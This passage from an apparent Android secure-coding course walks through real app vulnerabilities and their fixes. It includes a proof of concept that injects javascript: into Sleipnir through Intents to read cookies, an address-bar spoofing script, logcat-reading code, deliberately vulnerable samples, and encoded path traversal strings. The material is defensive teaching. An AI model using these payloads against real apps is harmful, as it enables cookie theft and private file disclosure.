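                // origin are dropped, so the bridge is only ever exposed to our own host.
                return !isTrusted(url);
            }
        });
        wv.addJavascriptInterface(new Bridge(), BRIDGE_NAME);
        wv.loadUrl(isTrusted(startUrl) ? startUrl : "about:blank");
    }
}
```

Two things the pinning cannot do for you: the trusted page must be served over TLS with a properly verified certificate (otherwise a network attacker substitutes the page and inherits the bridge), and it must not embed third-party frames, because the bridge is injected into every frame of the page, not only the main one.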
Refer to the JSSEC Secure Coding Guidebook
Summary of notes on the use of WebView.
CASE #6: Address Bar Spoofing
Address Bar Spoofing Vulnerability in Android Web Browsers
An attacker may display a URL different from that of the page contents. This could be abused for phishing.
https://play.google.com/store/apps/details?id=jp.co.yahoo.android.ybrowser
https://jvn.jp/en/jp/JVN55074201/
Attack Scenario: Phishing
"Yahoo! Browser" contains a flaw in displaying the URL, which allows the address bar to be spoofed.
1. A user accesses a malicious page on www.example.jp.
2. The server responds with the requested contents.
3. The address bar shows a URL which is different from the site being accessed.
How the Flaw Could Be Exploited
The malicious page on www.example.jp serves:
<script>
function spoof() {
  var w = window.open(the URL to spoof);
  w.document.write(some contents);
}
</script>
The Behavior of the Vulnerable App
With window.open(URL of Trusted Site) followed by w.document.write(actual contents), the address bar shows the trusted site's URL while the window shows the attacker's contents.
How it processed the JavaScript (our assumption):
• Opens a new browser window
• Displays the URL in the address bar
• Terminates the loading of the URL
• Writes 'some contents' to the window
• But doesn't update the address bar of the window?
What Is the Root Cause?
Two components failed to synchronize with each other: the address bar, which should show the origin of the page content as the URL, and the browser window, which should show the contents of that URL.
Solution?
Browsers behave differently:
a. Shows the incorrect URL.
b. The address bar is left blank. Pro: better than a., avoids confusing the contents and the URL. Con: the user can't determine where the contents came from.
c. document.write() is ignored. Pro: better than a., avoids confusing the contents and the URL. Con: the behavior may differ from what the developer intends.
Which is the preferable behavior? Any alternatives?
CASE #7: JavaScript Execution Context
Case
Opera, Sleipnir
Feature: web browser apps
Problem: JavaScript is executed in the context of the target site.
Attack Scenarios
An attacker sends multiple Intents:
1. First send an Intent to display the target site.
2. Then send the JavaScript you want to execute as another Intent.
For example: 1. send an Intent to display www.google.com; 2. send another Intent that displays the cookie using the javascript: scheme, javascript:alert(document.cookie).
PoC
93
String pkg = "jp.co.fenrir.android.sleipnir"; String cls = pkg + ".main.IntentActivity"; Intent intent1 = new Intent(); intent1.setClassName(pkg, cls); intent1.setAction("android.intent.action.VIEW"); intent1.setData(Uri.parse("http://www.google.com")); startActivity(intent1); try { Thread.sleep(3000); } catch (InterruptedException e) { e.printStackTrace(); } String js = "alert(document.cookie);"; Intent intent2 = new Intent(); intent2.setClassName(pkg, cls); intent2.setAction("android.intent.action.VIEW"); intent2.setData(Uri.parse(js)); startActivity(intent2);
Send the URL of the target
Send a URL that you want to be executed
Javascript is executed in the context of www.google.com
Solution
Verify the URI you received in the Intent — do not accept the Javascript scheme
The app has already been fixed — however, the code is obfuscated, so we couldn't confirm how it was fixed
Broadcasting Sensitive Information
CASE #8
Intent
Intent: a message object that is passed between components (such as Activity, Service, Broadcast Receiver, Content Provider)
— Explicit Intent: a package is specified
— Implicit Intent: a package is not specified; there is a risk of information leakage
Intent.setPackage(packageName): limits the packages that can resolve the Intent; available for Android 4.0 (API 14) or later
LINE for Android vulnerable in handling implicit intents
Handling implicit intents is inappropriate, information such as messages sent by LINE may be leaked
https://play.google.com/store/apps/details?id=jp.naver.line.androi http://jvn.jp/en/jp/JVN67435981/
LINE is an app for communication with others.
Attack Scenarios
[Figure: User → App → Message Information (Intent), broadcast to the Broadcast receivers of other Apps and of the Malicious app → Information Disclosure]
1. A user sends a message (suppose a malicious app is already installed)
2. The message is broadcast, so the malicious app can read it.
Solution
Q. How to fix the flaw?
A. Use an explicit Intent
[Figure: App → Message Information (Intent) → only its own Broadcast receiver; the Malicious app's Broadcast receiver is not reached]
• use an explicit Intent if you only want to send to your internal Broadcast receiver
• limit the destination class
Limit the destination using an explicit Intent
Refer to the JSSEC Secure Coding Guidebook
Use the explicit Intent with class specified to call a receiver within the same application.
Broadcast within own app
Use LocalBroadcastManager
— You know that the data you are broadcasting won't leave your app, so you don't need to worry about leaking private data
— It is not possible for other applications to send these broadcasts to your app, so you don't need to worry about having security holes they can exploit
— It is more efficient than sending a global broadcast through the system
Intent intent = new Intent("my-sensitive-event");
intent.putExtra("event", "this is a test event");
LocalBroadcastManager.getInstance(this).sendBroadcast(intent);
When You Implement Broadcast Receiver
Limit the destination if you need to send sensitive information: Intent#setClass(Context, Class)
If the app lacks a permission and an error occurs during the sending of the broadcast message, the error will also be sent to LogCat
— The error message in LogCat could leak the contents of the Intent
If you are publishing a Broadcast Receiver, consider the risk of Intents being sent from malware
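To put the three options of this case side by side, here is an added example (not LINE's code; the action string, the MessageReceiver class and the "text" extra are this example's own assumptions): the leaky implicit broadcast, the explicit Intent that names the destination class, and the LocalBroadcastManager variant from the previous slide, with a receiver that only acts on its own action.

```java
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.support.v4.content.LocalBroadcastManager;

// Added example, not LINE's code: the leaky implicit broadcast beside two fixes.
// ACTION_NEW_MESSAGE and MessageReceiver are assumed names for this app's own components.
public final class MessageBroadcasts {
    static final String ACTION_NEW_MESSAGE = "com.example.messenger.NEW_MESSAGE";

    // VULNERABLE: implicit broadcast. Any installed app whose receiver filters on this
    // action (the malicious receiver from the attack scenario included) gets the "text" extra.
    static void sendImplicit(Context ctx, String text) {
        Intent i = new Intent(ACTION_NEW_MESSAGE);
        i.putExtra("text", text);
        ctx.sendBroadcast(i);
    }

    // Fix 1: explicit Intent. The component is named, so the system delivers it only to
    // MessageReceiver in this package; declare the receiver with android:exported="false" too.
    static void sendExplicit(Context ctx, String text) {
        Intent i = new Intent(ctx, MessageReceiver.class);
        i.setAction(ACTION_NEW_MESSAGE);
        i.putExtra("text", text);
        ctx.sendBroadcast(i);
    }

    // Fix 2: LocalBroadcastManager. The Intent never leaves the process, so no other app
    // can receive it, and no other app can inject one either.
    static void sendLocal(Context ctx, String text) {
        Intent i = new Intent(ACTION_NEW_MESSAGE);
        i.putExtra("text", text);
        LocalBroadcastManager.getInstance(ctx).sendBroadcast(i);
    }

    // Registers the receiver for the local variant; the explicit variant uses the manifest entry.
    static void registerLocal(Context ctx, MessageReceiver receiver) {
        LocalBroadcastManager.getInstance(ctx)
                .registerReceiver(receiver, new IntentFilter(ACTION_NEW_MESSAGE));
    }

    public static final class MessageReceiver extends BroadcastReceiver {
        private volatile String lastText;

        @Override
        public void onReceive(Context ctx, Intent intent) {
            if (!ACTION_NEW_MESSAGE.equals(intent.getAction())) {
                return; // ignore anything that is not ours
            }
            lastText = intent.getStringExtra("text");
        }

        public String getLastText() {
            return lastText;
        }
    }
}
```

The explicit form is the one to use when the receiver must be a manifest-declared component (it has to wake up while the app is not running); the local form is the one to use when sender and receiver live in the same process, and it also removes the LogCat leak mentioned above, since no system-level permission check is involved.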
Logging Sensitive Information
CASE #9
Log Output
android.util.Log class
— Log.d (Debug) / Log.e (Error)
— Log.i (Info) / Log.v (Verbose) / Log.w (Warn)
Log.v("method", Login.TAG + ", account=" + str1);
Log.v("method", Login.TAG + ", password=" + str2);
example
Obtain Log Output
Declare the READ_LOGS permission in AndroidManifest.xml — apps with it can read log output
Call logcat from an app
<uses-permission android:name="android.permission.READ_LOGS"/>
AndroidManifest.xml
Process mProc = Runtime.getRuntime().exec(
        new String[]{"logcat", "-d", "method:V *:S"});
BufferedReader mReader = new BufferedReader(
        new InputStreamReader(mProc.getInputStream()));
example
Information Management Vulnerability
Account information or other information such as session IDs are saved in a log file
http://jvn.jp/jp/JVN31860555/ http://madoka-magica-game.channel.or.jp/#/Application
A Monaca account could have been hijacked
Attack Scenarios
[Figure: User → Monaca Debugger app → log output → Malicious app → Attacker; the account information is disclosed]
1. Monaca debugger app outputs the account information to the log
2. Malicious app can obtain the account information from the log
Causes of the Vulnerability
Causes
• Used logging for debugging purposes?
• Released without deleting the debug code?
• Any app with READ_LOGS permission could obtain all the other apps' log output
Solutions of the Vulnerability
Solutions
• The app should make sure that it does not send sensitive information to log output
• Declare and use a custom log class, so that log output is automatically turned on/off based on Debug/Release
• Use ProGuard to delete specific method calls
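The custom log class and the ProGuard rule from the solutions above, as an added example (not the Monaca app's code; it assumes the Gradle-generated BuildConfig.DEBUG constant of the app's own package and a release build that runs ProGuard with the rule shown in the trailing comment):

```java
import android.util.Log;

// Added example, not the Monaca app's code: a log wrapper that is silent in release
// builds. It assumes the Gradle-generated BuildConfig.DEBUG constant of the app's own
// package and the ProGuard rule in the comment at the end of this file.
public final class DebugLog {
    // Flip in one place: false in release builds, true in debug builds.
    private static final boolean ENABLED = BuildConfig.DEBUG;

    private DebugLog() {}

    public static void v(String tag, String msg) {
        if (ENABLED) Log.v(tag, msg);
    }

    public static void d(String tag, String msg) {
        if (ENABLED) Log.d(tag, msg);
    }

    // Errors are worth keeping in release, but never with secrets inside the message.
    public static void e(String tag, String msg, Throwable t) {
        Log.e(tag, msg, t);
    }

    /** Masks an identifier so even a debug line never carries the full account name. */
    public static String mask(String identifier) {
        if (identifier == null) return "null";
        if (identifier.length() <= 4) return "****";
        return identifier.substring(0, 2) + "****"
                + identifier.substring(identifier.length() - 2);
    }
}

/* ProGuard rule for the release build (proguard-rules.pro). With it the calls are removed
 * entirely, so the "account=" + str1 concatenation is never evaluated either:
 *
 *   -assumenosideeffects class com.example.app.DebugLog {
 *       public static void v(...);
 *       public static void d(...);
 *   }
 */
```

With this in place the first line of the example on the Log Output slide becomes DebugLog.v("method", Login.TAG + ", account=" + DebugLog.mask(str1)), and the password line is simply deleted: a password has no masked form worth logging. Note that the if (ENABLED) guard alone still builds the message string at runtime; only the ProGuard rule removes the call and its argument expression from the release APK.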
Android 4.0(API15) or before
Any application with READ_LOGS permission could obtain all the other app's log output
[Figure: App A calls Log.v("method", Login.TAG + ", account=" + str1); App B, holding the READ_LOGS permission, obtains the log output with Runtime.getRuntime().exec(new String[]{"logcat", "-d", "method:V *:S"})]
Android 4.1(API16) or later
The behavior of the READ_LOGS permission was changed — even an app with READ_LOGS permission cannot obtain log output from other apps
By connecting device to PC, log output from other app can still be obtained
[Figure: App B with the READ_LOGS permission can no longer obtain App A's log output]
Refer to JSSEC Secure Coding Guidebook
Sensitive information must not be output by android.util.Log
Storing Sensitive Data in External Storage (SD cards)
CASE #10
CVE-2012-4007
Malicious app could access friends’ comments
https://play.google.com/store/apps/details?id=jp.mixi https://jvn.jp/en/jp/JVN92038939/
SNS app for posting comments, checking friends’ updates, etc.
Attack Scenario
[Figure: SNS app → SD card (file: friends’ comments) → Other app (malware) → attacker; information leak]
1. SNS app fetches a comment of the user’s friend (supposedly sensitive)
2. SNS app saves it to the SD card
3. Other app retrieves the comment from the SD card
4. And sends it to an attacker
Root Cause
[Figure: the SNS app writes the file "friends’ comments" to the SD card; malware reads the same file]
• Friends’ comments are saved to the SD card
• The contents of the SD card can be read by other apps
Files on the SD card can be read by other apps
Solution
[Figure: friends’ comments are kept in a file created with MODE_PRIVATE in the App Directory (internal storage), which is NOT readable by malware, instead of on the SD card]
Save friends’ comments to a file in internal storage (application-specific directory)
Refer to the JSSEC Secure Coding Guidebook
4.6.1.1. Using Private Files
• Files should not be shared with other apps
• Files should be created with MODE_PRIVATE
Improper File Permissions
CASE #11
CVE-2013-2301 OpenWnn Info. Disclosure
Malicious App could access files stored in vulnerable app’s application data directory
Attack Scenario
User installs and executes a malicious app
[Figure: User installs the Mal app from an App Market, the attacker’s site, etc.; the Mal app accesses OpenWnn’s application data]
The malicious app steals OpenWnn’s application data
http://jvndb.jvn.jp/en/contents/2013/JVNDB-2013-000025.html
Application data is not supposed to be shared among apps, but improper file permissions make it possible
OpenWnn’s sensitive data is stolen
Root Cause
[Figure: same scenario: User installs the Mal app from an App Market, the attacker’s site, etc.; the Mal app accesses the file in the internal storage]
Internal storage is expected to protect private files, but files can be accessible if access permissions are improperly set.
The access permission of the created file was set to WORLD_READABLE. Other apps could read the file if the file path is known.
Solution
[Figure: same scenario diagram as on the previous two slides]
Internal storage is expected to protect private files, but files can be accessible if access permissions are improperly set.
Application data (private files) should be created with the access permission MODE_PRIVATE
Security Models are different in Android and Linux
In Linux, an application can read any other application’s data (the user’s files).
Application resources should be isolated unless the resource needs to be shared among different apps.
What do you mean by “user”? On Android each app has a different UID, so application data should be protected.
Saving application data in Android OS
Android provides several options for you to save persistent application data:
— Shared Preferences
— Internal Storage
— External Storage
— SQLite Databases
— Network Connection
http://developer.android.com/guide/topics/data/data-storage.html
Saving application data in Android OS
Take care where to save files…
— Shared Preferences
— Internal Storage
— External Storage
— SQLite Databases
— Network Connection
Those options use “private” local files.
Access Permissions of Android OS
The Context class of the android.content package defines the file access permissions: MODE_PRIVATE, MODE_WORLD_READABLE, MODE_WORLD_WRITABLE
Access Permissions of Android OS: MODE_PRIVATE
String FILENAME = "hello_file";
String string = "ciao world!";
FileOutputStream fos = openFileOutput(FILENAME, Context.MODE_PRIVATE);
fos.write(string.getBytes());
fos.close();
the created file can only be accessed by the calling application (or all applications sharing the same user ID).
Access Permissions of Android OS: MODE_WORLD_READABLE
allow all other applications to have read access to the created file.
“This constant was deprecated in API level 17. Creating world-readable files is very dangerous, and likely to cause security holes in applications. It is strongly discouraged; instead, applications should use more formal mechanism for interactions such as ContentProvider, BroadcastReceiver, and Service. …”
Access Permissions of Android OS: MODE_WORLD_WRITABLE
allow all other applications to have write access to the created file.
“This constant was deprecated in API level 17. Creating world-writable files is very dangerous, and likely to cause security holes in applications. It is strongly discouraged; instead, applications should use more formal mechanism for interactions such as ContentProvider, BroadcastReceiver, and Service. …”
Application sandboxing in Android OS
Android OS gives each application a distinct Linux user ID
Android OS takes advantage of Linux user-based protection to identify and isolate application resources
If you need to share data between applications, use an inter-process communication mechanism, e.g., ContentProvider, BroadcastReceiver, Service, …
http://source.android.com/devices/tech/security/index.html
Application-specific files should be isolated from other apps. That is Android’s basic principle!
Summary
Remember the design principle of Android OS
— Don’t allow other applications to access your local files
Use an IPC mechanism (such as ContentProvider) for sharing data among apps
When you need to share data with another app, consider the risk of malware and protect against it.
File permission of local files should be MODE_PRIVATE
Geolocation API and Privacy Concern
CASE #12
Geolocation API
Enables web browsers to access geographical location information of the user's device
— http://www.w3.org/TR/geolocation-API/
— Specified by W3C
To use the Geolocation API under WebView:
— Permissions: android.permission.ACCESS_FINE_LOCATION, android.permission.ACCESS_COARSE_LOCATION, android.permission.INTERNET
— WebView class: WebSettings#setGeolocationEnabled(true);
To Retrieve User’s Location Data on A Web Page
An example javascript of using Geolocation API:
<script>
navigator.geolocation.getCurrentPosition(
    function(position) {
        alert(position.coords.latitude);
        alert(position.coords.longitude);
    },
    function() {
        // error
    });
</script>
Ask for user's consent
Geolocation information should not be sent to websites without obtaining the user's consent
There are a lot of Vulnerable Code Out There
Vulnerable Implementation
public void onGeolocationPermissionsShowPrompt(String arg3,
        GeolocationPermissions.Callback arg4) {
    super.onGeolocationPermissionsShowPrompt(arg3, arg4);
    arg4.invoke(arg3, true, false);
}
Parameters of GeolocationPermissions.Callback#invoke(origin, allow, retain):
— origin: the origin for which permissions are set
— allow: whether or not the origin should be allowed to use the Geolocation API
— retain: whether the permission should be retained beyond the lifetime of a page currently being displayed by a WebView
The location is sent without asking the user's permission
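The consent-asking counterpart of the vulnerable implementation above, as an added example (not the vulnerable app's code; the class name, the dialog strings and the dismissal handling are this example's own): the callback is invoked with allow=true only after the user taps Allow, and every other outcome, including cancelling the dialog, is treated as a refusal.

```java
import android.app.AlertDialog;
import android.content.Context;
import android.content.DialogInterface;
import android.webkit.GeolocationPermissions;
import android.webkit.WebChromeClient;

// Added example, not the vulnerable app's code: a WebChromeClient that asks the user before
// an origin may read the device location. Class name and dialog strings are this example's own.
public class ConsentingChromeClient extends WebChromeClient {
    private final Context context;
    private AlertDialog dialog;

    public ConsentingChromeClient(Context context) {
        this.context = context;
    }

    @Override
    public void onGeolocationPermissionsShowPrompt(final String origin,
                                                   final GeolocationPermissions.Callback callback) {
        dismiss();
        dialog = new AlertDialog.Builder(context)
                .setTitle("Share your location?")
                .setMessage(origin + " wants to know your location.")
                .setPositiveButton("Allow", new DialogInterface.OnClickListener() {
                    @Override public void onClick(DialogInterface d, int which) {
                        // allow only this origin, and only for the page being displayed (retain=false)
                        callback.invoke(origin, true, false);
                    }
                })
                .setNegativeButton("Deny", new DialogInterface.OnClickListener() {
                    @Override public void onClick(DialogInterface d, int which) {
                        callback.invoke(origin, false, false);
                    }
                })
                .setOnCancelListener(new DialogInterface.OnCancelListener() {
                    @Override public void onCancel(DialogInterface d) {
                        // back button or a tap outside the dialog counts as a refusal
                        callback.invoke(origin, false, false);
                    }
                })
                .show();
    }

    @Override
    public void onGeolocationPermissionsHidePrompt() {
        // the page navigated away or withdrew the request: drop the stale prompt
        dismiss();
    }

    private void dismiss() {
        if (dialog != null && dialog.isShowing()) dialog.dismiss();
        dialog = null;
    }
}
```

Wire it up with webView.setWebChromeClient(new ConsentingChromeClient(this)) after enabling Javascript and geolocation in the WebSettings. Showing the origin in the dialog matters: the user is consenting to a specific site, not to "the app", and the retain=false argument keeps that decision scoped to the page on screen.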
Attack Scenarios
Only need to induce the user to visit a website
Then, an attacker can get the user's geolocation information
Summary
Only send geolocation information to a website after obtaining the user's consent
Android Cipher List Issue
CASE #13
Best Practice for Using Cryptography
http://developer.android.com/guide/practices/security.html#Crypto
“In general, try using the highest level of pre-existing framework implementation that can support your use case. ………
If you cannot avoid implementing your own protocol, we strongly recommend that you do not implement your own cryptographic algorithms.”
Best Practice for Using Cryptography
When you need to implement your own protocol, you will need:
— A clear understanding of the algorithm
— Fine coding skill to implement the algorithm correctly
— Sophisticated testing skill to verify the code is correct
As a casual application developer, you should rely on popular (well-tested) frameworks/libraries.
However……
Android Cipher List Issue
http://op-co.de/blog/posts/android_ssl_downgrade/
RSA/MD5 is on the top!
Android Cipher List Issue
… from Source code of Android 4.1_r2
/**
 * Provides the Java side of our JNI glue for OpenSSL.
 */
public final class NativeCrypto {
    …………
    static {
        // Note these are added in priority order
        add("SSL_RSA_WITH_RC4_128_MD5", "RC4-MD5");
        add("SSL_RSA_WITH_RC4_128_SHA", "RC4-SHA");
        add("TLS_RSA_WITH_AES_128_CBC_SHA", "AES128-SHA");
        add("TLS_RSA_WITH_AES_256_CBC_SHA", "AES256-SHA");
        add("TLS_ECDH_ECDSA_WITH_RC4_128_SHA", "ECDH-ECDSA-RC4-SHA");
        ............
https://android.googlesource.com/platform/libcore/+/android-cts-4.1_r2/luni/src/main/java/org/apache/harmony/xnet/provider/jsse/NativeCrypto.java
Cipher list is hard-coded
RC4-MD5 should be avoided
Disable RC4 The RC4 cipher suite is considered insecure and should be disabled. At the moment, the best attacks we know require millions of requests, a lot of bandwidth and time. Thus, the risk is still relatively low, but we expect that the attacks will improve in the future.
From Qualys SSL Labs, “SSL/TLS Deployment Best Practices”
https://www.ssllabs.com/projects/best-practices/
Solution
Customize the cipher list using setEnabledCipherSuites()
Solution
Customize the cipher list using setProperty("https.cipherSuites", …)
http://blog.livedoor.jp/k_urushima/archives/cat_38371.html
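The setEnabledCipherSuites() solution from the two slides above, as an added example (not Android platform code; the class name, the list of substrings treated as weak and the installAsDefault() helper are this example's own): a wrapper around the platform's SSLSocketFactory that filters the enabled suites on every socket it creates, so RC4 and MD5 are never offered regardless of the order hard-coded in NativeCrypto.

```java
import java.io.IOException;
import java.net.InetAddress;
import java.net.Socket;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

// Added example, not Android platform code: wraps the platform SSLSocketFactory and calls
// setEnabledCipherSuites() on every socket so RC4 and MD5 suites are never offered,
// whatever order NativeCrypto hard-codes. The class name is this example's own.
public final class SafeCipherSocketFactory extends SSLSocketFactory {
    private final SSLSocketFactory delegate;

    public SafeCipherSocketFactory(SSLSocketFactory delegate) {
        this.delegate = delegate;
    }

    /** Drops RC4, MD5, NULL, anonymous, export and (3)DES suites; keeps the platform's order. */
    static String[] filterSuites(String[] suites) {
        List<String> kept = new ArrayList<String>();
        for (String s : suites) {
            String u = s.toUpperCase(Locale.ROOT);
            boolean weak = u.contains("RC4") || u.contains("MD5") || u.contains("NULL")
                    || u.contains("ANON") || u.contains("EXPORT") || u.contains("DES");
            if (!weak) kept.add(s);
        }
        return kept.toArray(new String[kept.size()]);
    }

    private Socket harden(Socket s) {
        if (s instanceof SSLSocket) {
            SSLSocket ssl = (SSLSocket) s;
            // filter what is enabled rather than what is supported, so nothing the
            // platform disabled on purpose gets switched back on
            ssl.setEnabledCipherSuites(filterSuites(ssl.getEnabledCipherSuites()));
        }
        return s;
    }

    @Override public String[] getDefaultCipherSuites() {
        return filterSuites(delegate.getDefaultCipherSuites());
    }
    @Override public String[] getSupportedCipherSuites() {
        return filterSuites(delegate.getSupportedCipherSuites());
    }
    @Override public Socket createSocket(Socket s, String host, int port, boolean autoClose)
            throws IOException {
        return harden(delegate.createSocket(s, host, port, autoClose));
    }
    @Override public Socket createSocket(String host, int port) throws IOException {
        return harden(delegate.createSocket(host, port));
    }
    @Override public Socket createSocket(String host, int port, InetAddress localHost, int localPort)
            throws IOException {
        return harden(delegate.createSocket(host, port, localHost, localPort));
    }
    @Override public Socket createSocket(InetAddress host, int port) throws IOException {
        return harden(delegate.createSocket(host, port));
    }
    @Override public Socket createSocket(InetAddress host, int port, InetAddress localHost, int localPort)
            throws IOException {
        return harden(delegate.createSocket(host, port, localHost, localPort));
    }

    /** Installs the filtered factory for every HttpsURLConnection in the process. */
    public static void installAsDefault() {
        SSLSocketFactory platform = (SSLSocketFactory) SSLSocketFactory.getDefault();
        HttpsURLConnection.setDefaultSSLSocketFactory(new SafeCipherSocketFactory(platform));
    }
}
```

Call SafeCipherSocketFactory.installAsDefault() once at application start. The wrapper only removes suites; it never adds any and it leaves certificate and hostname verification exactly as the platform does it, which is the part of TLS that the later certificate-verification case shows apps getting wrong most often.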
Path Traversal
CASE #14
CVE-2013-0704: GREE Path Traversal Vulnerability
GREE https://play.google.com/store/apps/details?id=jp.gree.android.app
Feature: Mobile social gaming app
Vulnerability: Other apps could obtain the private files of the app
Overview of Vulnerability
The implementation of ContentProvider contained a flaw — the openFile method was used for sharing image files
ContentProvider#openFile — provides a facility for other apps to access your app's data.
Vulnerable Code
In the openFile method:
— Obtain the last segment of the path using Uri#getLastPathSegment
— Return the target file from the specified directory
private static String IMAGE_DIRECTORY = localFile.getAbsolutePath();

public ParcelFileDescriptor openFile(Uri paramUri, String paramString)
        throws FileNotFoundException {
    File file = new File(IMAGE_DIRECTORY, paramUri.getLastPathSegment());
    return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_ONLY);
}
jp/gree/android/sdk/ImageProvider
Uri#getLastPathSegment
Uri#getLastPathSegment internally calls Uri#getPathSegments
public String getLastPathSegment() {
    // TODO: If we haven't parsed all of the segments already, just
    // grab the last one directly so we only allocate one string.
    List<String> segments = getPathSegments();
    int size = segments.size();
    if (size == 0) {
        return null;
    }
    return segments.get(size - 1);
}
Excerpt from Uri#getPathSegments
PathSegmentsBuilder segmentBuilder = new PathSegmentsBuilder();
int previous = 0;
int current;
while ((current = path.indexOf('/', previous)) > -1) {
    // This check keeps us from adding a segment if the path starts
    // '/' and an empty segment for "//".
    if (previous < current) {
        String decodedSegment = decode(path.substring(previous, current));
        segmentBuilder.add(decodedSegment);
    }
    previous = current + 1;
}
// Add in the final path segment.
if (previous < path.length()) {
    segmentBuilder.add(decode(path.substring(previous)));
}
return pathSegments = segmentBuilder.build();
}
Uri#getPathSegments
The path is divided into segments using "/" as a separator, and each segment is then decoded.
Example input: ../../%E3%81%BB%E3%81%92%2Ejpg
The path is separated by "/" into the segments "..", "..", "hoge.jpg"
Uri#getPathSegments
What happens if "/" in the path is URL-encoded to "%2F"?
Example input: ../../..%2F..%2F%E3%81%BB%E3%81%92%2Ejpg
"/" are separated, but "%2F" are not, so the segments are "..", "..", "../../hoge.jpg"
Therefore, after the path separation, the last path segment containing "%2F" is decoded to "/", which allows path traversal.
Fix Applied by the Developer
Uri#getLastPathSegment is called twice
private static String IMAGE_DIRECTORY = localFile.getAbsolutePath();

public ParcelFileDescriptor openFile(Uri paramUri, String paramString)
        throws FileNotFoundException {
    File file = new File(IMAGE_DIRECTORY,
            Uri.parse(paramUri.getLastPathSegment()).getLastPathSegment());
    return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_ONLY);
}
The first getLastPathSegment: ../../..%2F..%2F%E3%81%BB%E3%81%92%2Ejpg → ../../hoge.jpg
The second getLastPathSegment: ../../hoge.jpg → hoge.jpg
Is This Fix Enough?
Double Encoding
Encode the encoded text.
https://www.owasp.org/index.php/Double_Encoding
Encoded once: ..%2F..%2F%E3%81%BB%E3%81%92%2Ejpg
Encoded twice: %252E%252E%252F%252E%252E%252F%25E3%2581%25BB%25E3%2581%2592%252Ejpg
What if path is double-encoded? How does the previous fix decode a double-encoded path?
The first getLastPathSegment: %252E%252E%252F%252E%252E%252F%25E3%2581%25BB%25E3%2581%2592%252Ejpg → %2E%2E%2F%2E%2E%2F%E3%81%BB%E3%81%92%2Ejpg (decodes "%25" to "%")
The second getLastPathSegment: %2E%2E%2F%2E%2E%2F%E3%81%BB%E3%81%92%2Ejpg → ../../hoge.jpg
Again, path traversal is possible
Solution
First canonicalize the path using File#getCanonicalPath. Then check to see if the canonicalized path is under the IMAGE_DIRECTORY.
private static String IMAGE_DIRECTORY = localFile.getAbsolutePath();

public ParcelFileDescriptor openFile(Uri paramUri, String paramString)
        throws FileNotFoundException {
    String decodedUriString = Uri.decode(paramUri.toString());
    File file = new File(IMAGE_DIRECTORY,
            Uri.parse(decodedUriString).getLastPathSegment());
    try {
        // getCanonicalPath() resolves "..", symlinks and separators that only appeared
        // after decoding, so the check below sees the path that will really be opened
        String canonicalFile = file.getCanonicalPath();
        String canonicalDir = localFile.getCanonicalPath();
        // require the directory prefix AND a separator, so that a sibling directory whose
        // name merely starts with the image directory's name does not pass
        if (!canonicalFile.startsWith(canonicalDir + File.separator)) {
            throw new IllegalArgumentException();
        }
    } catch (IOException e) {
        // getCanonicalPath() can fail on I/O errors; treat that as "file not found"
        throw new FileNotFoundException(e.getMessage());
    }
    return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_ONLY);
}
Summary
First, canonicalize the path — File#getCanonicalPath()
Then, validate the canonicalized path
Reference
— https://www.securecoding.cert.org/confluence/display/java/IDS02-J.+Canonicalize+path+names+before+validating+them
— https://www.owasp.org/index.php/Double_Encoding
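To exercise the canonicalize-then-validate rule of this summary, and the single- and double-encoded inputs from the slides before it, outside Android, here is an added example in plain Java (not GREE's code; the class name, the repeated-decoding loop and the temporary base directory are this example's own choices): it decodes the untrusted name until it stops changing, resolves it under the base directory, canonicalizes, and then demands the base directory plus a separator as prefix.

```java
import java.io.File;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;

// Added example, not GREE's code: canonicalize-then-validate for a file name taken from
// untrusted input, written in plain Java so it can be run outside Android.
public final class SafeFileResolver {
    private final File baseDir;
    private final String canonicalBase;

    public SafeFileResolver(File baseDir) throws IOException {
        this.baseDir = baseDir;
        this.canonicalBase = baseDir.getCanonicalPath();
    }

    /** Decodes until the string stops changing, so %252F and %2F both end up as "/"
     *  before validation. Bounded, so a pathological input cannot loop for long. */
    static String fullyDecode(String s) throws UnsupportedEncodingException {
        String prev;
        int rounds = 0;
        do {
            prev = s;
            s = URLDecoder.decode(s, "UTF-8"); // throws IllegalArgumentException on a bad %xx
        } while (!s.equals(prev) && ++rounds < 5);
        return s;
    }

    /** Returns the file to open, or null if the name escapes baseDir. */
    public File resolve(String untrustedName) throws IOException {
        String decoded = fullyDecode(untrustedName);
        File candidate = new File(baseDir, decoded);
        String canonical = candidate.getCanonicalPath();
        // The separator is part of the prefix: with baseDir "/data/images", a canonical
        // path of "/data/images2/x" must not pass, and baseDir itself is not a file.
        if (!canonical.equals(canonicalBase)
                && canonical.startsWith(canonicalBase + File.separator)) {
            return candidate;
        }
        return null;
    }

    public static void main(String[] args) throws IOException {
        SafeFileResolver r = new SafeFileResolver(
                new File(System.getProperty("java.io.tmpdir"), "images"));
        // constructed inputs: the plain name, the raw traversal, and the encoded forms
        // shown on the slides
        String[] inputs = {
            "hoge.jpg",
            "../../hoge.jpg",
            "..%2F..%2F%E3%81%BB%E3%81%92%2Ejpg",
            "%252E%252E%252F%252E%252E%252F%25E3%2581%25BB%25E3%2581%2592%252Ejpg",
        };
        for (String in : inputs) {
            File f = r.resolve(in);
            System.out.println(in + " -> " + (f == null ? "REJECTED" : f.getCanonicalPath()));
        }
    }
}
```

Only the first input is accepted; the other three resolve to a parent of the images directory after canonicalization and are rejected, which is the property the two-call getLastPathSegment fix could not give because it validated before the last decoding step.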
Unsafe Decompression of Zip Files
CASE #15
ZIP File and Security
When extracting entries from a ZIP archive, be prepared to mitigate Zip Bomb and Directory Traversal attacks.
https://www.securecoding.cert.org/confluence/x/3AG-Aw
java.util.zip package
java.util.zip provides classes for reading from and writing to the standard ZIP and GZIP file formats.
ZipInputStream -- implements an input stream filter for reading ZIP files
ZipOutputStream -- implements an output stream filter for writing ZIP files
ZipEntry -- represents a ZIP file entry
GZIPInputStream -- implements an input stream filter for reading GZIP files
GZIPOutputStream -- implements an output stream filter for writing GZIP files
ZipBomb
A zip bomb is a small file whose contents, when decompressed, are more than the system can handle.
Highly compressed; consumes memory and/or disk
Decompressing Zip files without confirming the resulting size could lead to DoS!!
More Bombs...
